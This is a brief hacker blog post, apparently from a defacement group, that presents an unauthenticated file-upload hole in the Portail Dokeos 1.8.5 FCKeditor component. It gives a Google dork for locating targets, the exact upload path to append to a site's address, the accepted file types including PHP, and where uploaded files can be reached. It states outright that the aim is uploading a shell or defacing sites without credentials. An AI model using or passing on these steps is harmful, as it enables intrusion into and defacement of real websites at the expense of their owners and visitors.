![=-=>>W3LC[]M3<<=-=](http://3.bp.blogspot.com/-HQcdYiso0K4/UDjeSQBP6mI/AAAAAAAAAEE/1JtAW52i4iU/s1600/2.jpg)
Portail Dokeos vulnerability is a Kind of FCK editor remote file upload vulnerability in this vulnerability hacker can upload a shell. deface page or any file on website without admin username and password.
Google Dork
"Portail Dokeos 1.8.5"
Exploit http://website/patch/main/inc/lib/fckeditor/editor/filemanager/upload/test.html
Just add "/main/inc/lib/fckeditor/editor/filemanager/upload/test.html" after www.website.com.
You can upload, .html .php .jpg .txt formats here. To view your uploaded file go here : http://website/patch/main/upload/your file here
we love iran ~~~~~~~~ www.max-team.ir~~~~~~~ miladviper
ReplyDelete